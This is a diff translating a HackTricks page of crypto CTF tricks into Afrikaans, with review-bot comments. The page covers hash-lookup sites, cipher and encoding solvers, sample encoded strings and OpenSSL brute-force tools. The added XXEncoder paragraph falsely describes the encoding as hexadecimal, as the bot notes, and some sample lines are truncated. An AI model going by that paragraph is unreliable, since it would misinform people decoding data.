<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
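Review bot: the English source lines kept as context in this hunk carry grammar errors that the Afrikaans side silently corrects, so the two columns no longer say the same thing word for word: L6031 "If the cookies is just the username encrypted ... you will get it's cookie" (should be "the cookie is" and "its cookie") versus the correct "sy koekie" at L6040, and L6003 "is s32**.**" with stray bold markers versus the clean "wat s32 is." at L6012. Please fix the English source in a follow-up so future translation passes do not re-import the errors. The translation of the attack steps themselves (L5916-L5919, L5935, L5951, L6009-L6015, L6037-L6043) matches the source, including the `E(m1 XOR 0) = s1` / `E(m2 XOR s1) = s32` derivation left unchanged at L5924-L5943.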
@ -1,22 +1,22 @@
|
|||
# Crypto CTFs Tricks
|
||||
# Crypto CTFs Truuks
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Online Hashes DBs
|
||||
## Aanlyn Hash-databasisse
|
||||
|
||||
* _**Google it**_
|
||||
* _**Google dit**_
|
||||
* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
|
||||
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com)
|
||||
* [https://crackstation.net/](https://crackstation.net)
|
@ -28,26 +28,26 @@ Other ways to support HackTricks:
* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
|
||||
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
|
||||
|
||||
## Magic Autosolvers
|
||||
## Toveroplossers
|
||||
|
||||
* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic module)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic-module)
|
||||
* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
* [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
|
||||
|
||||
## Encoders
|
||||
## Enkoders
|
||||
|
||||
Most of encoded data can be decoded with these 2 ressources:
|
||||
Die meeste gekodeerde data kan ontsluit word met hierdie 2 hulpbronne:
|
||||
|
||||
* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
|
||||
### Substitution Autosolvers
|
||||
### Substitusie Toveroplossers
|
||||
|
||||
* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
|
||||
* [https://quipqiup.com/](https://quipqiup.com) - Very good !
|
||||
* [https://quipqiup.com/](https://quipqiup.com) - Baie goed!
|
||||
|
||||
#### Caesar - ROTx Autosolvers
|
||||
#### Caesar - ROTx Toveroplossers
|
||||
|
||||
* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
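Review bot: the term "Toveroplossers" (L6236, L6285, L6304) is a Dutch-style coinage and is inconsistent with how the same source word "Autosolver" is rendered later in this file ("XOR - Outomatiese oplosser"); use "Outomatiese oplossers" in all three headings so the terminology matches.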
@ -55,97 +55,89 @@ Most of encoded data can be decoded with these 2 ressources:
|
||||
* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
|
||||
|
||||
### Base Encodings Autosolver
|
||||
### Basisenkoderings Toveroplossers
|
||||
|
||||
Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
Kyk na al hierdie basisse met: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
|
||||
* **Ascii85**
|
||||
* `BQ%]q@psCd@rH0l`
|
||||
* `BQ%]q@psCd@rH0l`
|
||||
* **Base26** \[_A-Z_]
|
||||
* `BQEKGAHRJKHQMVZGKUXNT`
|
||||
* `BQEKGAHRJKHQMVZGKUXNT`
|
||||
* **Base32** \[_A-Z2-7=_]
|
||||
* `NBXWYYLDMFZGCY3PNRQQ====`
|
||||
* `NBXWYYLDMFZGCY3PNRQQ====`
|
||||
* **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
|
||||
* `pbzsaamdcf3gna5xptoo====`
|
||||
* `pbzsaamdcf3gna5xptoo====`
|
||||
* **Base32 Geohash** \[_0-9b-hjkmnp-z_]
|
||||
* `e1rqssc3d5t62svgejhh====`
|
||||
* `e1rqssc3d5t62svgejhh====`
|
||||
* **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_]
|
||||
* `D1QPRRB3C5S62RVFDHGG====`
|
||||
* `D1QPRRB3C5S62RVFDHGG====`
|
||||
* **Base32 Extended Hexadecimal** \[_0-9A-V_]
|
||||
* `D1NMOOB3C5P62ORFDHGG====`
|
||||
* `D1NMOOB3C5P62ORFDHGG====`
|
||||
* **Base45** \[_0-9A-Z $%\*+-./:_]
|
||||
* `59DPVDGPCVKEUPCPVD`
|
||||
* `59DPVDGPCVKEUPCPVD`
|
||||
* **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_]
|
||||
* `2yJiRg5BF9gmsU6AC`
|
||||
* `2yJiRg5BF9gmsU6AC`
|
||||
* **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_]
|
||||
* `2YiHqF5bf9FLSt6ac`
|
||||
* `2YiHqF5bf9FLSt6ac`
|
||||
* **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
|
||||
* `pyJ5RgnBE9gm17awU`
|
||||
* `pyJ5RgnBE9gm17awU`
|
||||
* **Base62** \[_0-9A-Za-z_]
|
||||
* `g2AextRZpBKRBzQ9`
|
||||
* `g2AextRZpBKRBzQ9`
|
||||
* **Base64** \[_A-Za-z0-9+/=_]
|
||||
* `aG9sYWNhcmFjb2xh`
|
||||
* `aG9sYWNhcmFjb2xh`
|
||||
* **Base67** \[_A-Za-z0-9-_.!\~\_]
|
||||
* `NI9JKX0cSUdqhr!p`
|
||||
* `NI9JKX0cSUdqhr!p`
|
||||
* **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `BQ%]q@psCd@rH0l`
|
||||
* `BQ%]q@psCd@rH0l`
|
||||
* **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `<~BQ%]q@psCd@rH0l~>`
|
||||
* `<~BQ%]q@psCd@rH0l~>`
|
||||
* **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
|
||||
* `Xm4y`V\_|Y(V{dF>\`
|
||||
* `Xm4y`V\_|Y(V{dF>\`
|
||||
* **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
|
||||
* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
|
||||
* **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__]
|
||||
* `Xm4y|V{~Y+V}dF?`
|
||||
* `Xm4y|V{~Y+V}dF?`
|
||||
* **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
|
||||
* `frDg[*jNN!7&BQM`
|
||||
* `frDg[*jNN!7&BQM`
|
||||
* **Base100** \[]
|
||||
* `👟👦👣👘👚👘👩👘👚👦👣👘`
|
||||
* `👟👦👣👘👚👘👩👘👚👦👣👘`
|
||||
* **Base122** \[]
|
||||
* `4F ˂r0Xmvc`
|
||||
* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
|
||||
* `MIc3KiXa+Ihz+lrXMIc3KbCC`
|
||||
* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
|
||||
* `DmPsv8J7qrlKEoY7`
|
||||
* `4F
|
||||
* `DmPsv8J7qrlKEoY7`
|
||||
* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
|
||||
* `kLD8iwKsigSalLJ5`
|
||||
* `kLD8iwKsigSalLJ5`
|
||||
* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
|
||||
* `ayRiIo1gpO+uUc7g`
|
||||
* `ayRiIo1gpO+uUc7g`
|
||||
* **ESAB46** \[]
|
||||
* `3sHcL2NR8WrT7mhR`
|
||||
* `3sHcL2NR8WrT7mhR`
|
||||
* **MEGAN45** \[]
|
||||
* `kLD8igSXm2KZlwrX`
|
||||
* `kLD8igSXm2KZlwrX`
|
||||
* **TIGO3FX** \[]
|
||||
* `7AP9mIzdmltYmIP9mWXX`
|
||||
* `7AP9mIzdmltYmIP9mWXX`
|
||||
* **TRIPO5** \[]
|
||||
* `UE9vSbnBW6psVzxB`
|
||||
* `UE9vSbnBW6psVzxB`
|
||||
* **FERON74** \[]
|
||||
* `PbGkNudxCzaKBm0x`
|
||||
* `PbGkNudxCzaKBm0x`
|
||||
* **GILA7** \[]
|
||||
* `D+nkv8C1qIKMErY1`
|
||||
* `D+nkv8C1qIKMErY1`
|
||||
* **Citrix CTX1** \[]
|
||||
* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
|
||||
* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
|
||||
|
||||
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dood: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
|
||||
### HackerizeXS \[_╫Λ↻├☰┏_]
|
||||
|
||||
```
|
||||
╫☐↑Λ↻Λ┏Λ↻☐↑Λ
|
||||
```
|
||||
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dood: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
|
||||
### Morse
|
||||
|
||||
```
|
||||
.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
|
||||
```
|
||||
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
* [http://k4.cba.pl/dw/crypo/tools/af\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/af\_morse-encode.html) - 404 Dood: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
|
||||
### UUencoder
|
||||
|
||||
```
|
||||
begin 644 webutils_pl
|
||||
M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(
@ -154,129 +146,117 @@ F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$`
`
|
||||
end
|
||||
```
|
||||
|
||||
* [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
|
||||
|
||||
### XXEncoder
|
||||
### XXKoder
|
||||
|
||||
XXEncoder is a simple encoding technique that converts ASCII characters to their hexadecimal representation. It is commonly used to obfuscate data or bypass certain security measures. To decode the encoded data, you can use an online XXDecoder tool or write a custom script. Keep in mind that XXEncoder is a basic encoding method and may not provide strong security.
|
||||
```
|
||||
begin 644 webutils_pl
|
||||
hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236
|
||||
5Hol-G2xAEE++
|
||||
end
|
||||
```
|
||||
|
||||
* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
|
||||
|
||||
### YEncoder
|
||||
|
||||
* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
|
||||
|
||||
### YEncoder
|
||||
```
|
||||
=ybegin line=128 size=28 name=webutils_pl
|
||||
ryvkryvkryvkryvkryvkryvkryvk
|
||||
=yend size=28 crc32=35834c86
|
||||
```
|
||||
|
||||
* [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc)
|
||||
|
||||
### BinHex
|
||||
|
||||
BinHex is 'n formaat wat gebruik word om binêre lêers te vertaal na 'n teksformaat wat veilig oorgedra kan word. Dit word dikwels gebruik om lêers te omskep vir oordrag oor e-pos of ander kommunikasiekanale wat slegs teks ondersteun. BinHex gebruik 'n spesiale algoritme om die binêre data om te skakel na 'n reeks ASCII-karakters. Hierdie omgesette teks kan dan veilig oorgedra word sonder om data te verloor of te beskadig. BinHex is 'n nuttige hulpmiddel vir die oordra van binêre lêers in 'n veilige en betroubare formaat.
|
||||
```
|
||||
(This file must be converted with BinHex 4.0)
|
||||
:#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p
|
||||
-38K26%'d9J!!:
|
||||
```
|
||||
|
||||
* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
|
||||
|
||||
### ASCII85
|
||||
|
||||
ASCII85 is 'n binêre na teks-koderingsalgoritme wat gebruik word om binêre data om te skakel na 'n teksvorm wat bestaan uit ASCII-karakters. Dit is nuttig vir die oordra van binêre data in 'n teksgebaseerde omgewing, soos e-pos of tekslêers. ASCII85 kodeer elke 4 byte van binêre data na 5 ASCII-karakters.
|
||||
```
|
||||
<~85DoF85DoF85DoF85DoF85DoF85DoF~>
|
||||
```
|
||||
|
||||
* [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85)
|
||||
|
||||
### Dvorak keyboard
|
||||
|
||||
### Dvorak sleutelbord
|
||||
```
|
||||
drnajapajrna
|
||||
```
|
||||
|
||||
* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard)
|
||||
* [https://www.geocachingtoolbox.com/index.php?lang=af\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=af\&page=dvorakKeyboard)
|
||||
|
||||
### A1Z26
|
||||
|
||||
Letters to their numerical value
|
||||
|
||||
Briewe na hul numeriese waarde
|
||||
```
|
||||
8 15 12 1 3 1 18 1 3 15 12 1
|
||||
```
|
||||
|
||||
### Affine Cipher Encode
|
||||
|
||||
Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter
|
||||
|
||||
Letter na nommer `(ax+b)%26` (_a_ en _b_ is die sleutels en _x_ is die letter) en die resultaat terug na 'n letter.
|
||||
```
|
||||
krodfdudfrod
|
||||
```
|
||||
### SMS Kode
|
||||
|
||||
### SMS Code
|
||||
**Multitap** [vervang 'n letter](https://www.dcode.fr/word-letter-change) deur herhaalde syfers wat gedefinieer word deur die ooreenstemmende sleutelkode op 'n mobiele [foon sleutelbord](https://www.dcode.fr/phone-keypad-cipher) (Hierdie modus word gebruik wanneer SMS'e geskryf word).\
|
||||
Byvoorbeeld: 2=A, 22=B, 222=C, 3=D...\
|
||||
Jy kan hierdie kode identifiseer omdat jy\*\* verskeie herhaalde syfers\*\* sal sien.
|
||||
|
||||
**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\
|
||||
For example: 2=A, 22=B, 222=C, 3=D...\
|
||||
You can identify this code because you will see\*\* several numbers repeated\*\*.
|
||||
Jy kan hierdie kode ontsyfer by: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
|
||||
|
||||
You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
|
||||
|
||||
### Bacon Code
|
||||
|
||||
Substitude each letter for 4 As or Bs (or 1s and 0s)
|
||||
### Bacon Kode
|
||||
|
||||
Vervang elke letter met 4 As of Bs (of 1s en 0s)
|
||||
```
|
||||
00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000
|
||||
AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
|
||||
```
|
||||
|
||||
### Runes
|
||||
### Rune
|
||||
|
||||
![](../.gitbook/assets/runes.jpg)
|
||||
|
||||
## Compression
|
||||
## Saamdruk
|
||||
|
||||
**Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers.
|
||||
**Raw Deflate** en **Raw Inflate** (jy kan beide in Cyberchef vind) kan data saamdruk en ontspan sonder koppe.
|
||||
|
||||
## Easy Crypto
|
||||
## Maklike Kriptografie
|
||||
|
||||
### XOR - Autosolver
|
||||
### XOR - Outomatiese oplosser
|
||||
|
||||
* [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
|
||||
|
||||
### Bifid
|
||||
|
||||
A keywork is needed
|
||||
|
||||
'n Sleutelwoord is nodig
|
||||
```
|
||||
fgaargaamnlunesuneoa
|
||||
```
|
||||
|
||||
### Vigenere
|
||||
|
||||
A keywork is needed
|
||||
|
||||
'n Sleutelwoord is nodig
|
||||
```
|
||||
wodsyoidrods
|
||||
```
|
||||
|
||||
* [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)
|
||||
* [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
|
||||
* [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
|
||||
|
||||
## Strong Crypto
|
||||
## Sterk Kriptografie
|
||||
|
||||
### Fernet
|
||||
|
||||
2 base64 strings (token and key)
|
||||
|
||||
2 basis64 strings (token en sleutel)
|
||||
```
|
||||
Token:
|
||||
gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q==
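Review bot: the XXEncoder, BinHex and ASCII85 sections gain explanatory paragraphs that are not in the source, and the XXEncoder one is both untranslated (still English) and wrong: xxencode, like uuencode, maps groups of 3 bytes to 4 printable characters (the sample `hG2xAEIVDH236Hol-...` with its `begin 644` header shows this), not "hexadecimal representation". A translation PR should not add content; drop all three paragraphs. Two smaller points in the same hunk: the Dvorak tool link's query string was changed from `lang=en` to `lang=af`, which is a URL parameter and must stay as in the source, and "Briewe na hul numeriese waarde" uses the word for mailed letters where "Letters" (characters) is meant.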
@ -284,19 +264,16 @@ gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmC
Key:
|
||||
-s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI=
|
||||
```
|
||||
|
||||
* [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
|
||||
|
||||
### Samir Secret Sharing
|
||||
|
||||
A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
|
||||
### Samir Geheime Deling
|
||||
|
||||
'n Geheim word in X dele verdeel en om dit te herstel, het jy Y dele nodig (_Y <=X_).
|
||||
```
|
||||
8019f8fa5879aa3e07858d08308dc1a8b45
|
||||
80223035713295bddf0b0bd1b10a5340b89
|
||||
803bc8cf294b3f83d88e86d9818792e80cd
|
||||
```
|
||||
|
||||
[http://christian.gen.co/secrets/](http://christian.gen.co/secrets/)
|
||||
|
||||
### OpenSSL brute-force
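Review bot: the heading "Samir Geheime Deling" carries over the source's misspelling of Shamir; since the line is being rewritten anyway, name it "Shamir Geheime Deling" (the scheme is Shamir's secret sharing, and the threshold note "Y <= X" below it refers to that scheme).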
@ -304,7 +281,7 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
|
||||
* [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF)
|
||||
|
||||
## Tools
|
||||
## Gereedskap
|
||||
|
||||
* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
|
||||
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
@ -312,14 +289,14 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
@ -1,104 +1,94 @@
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
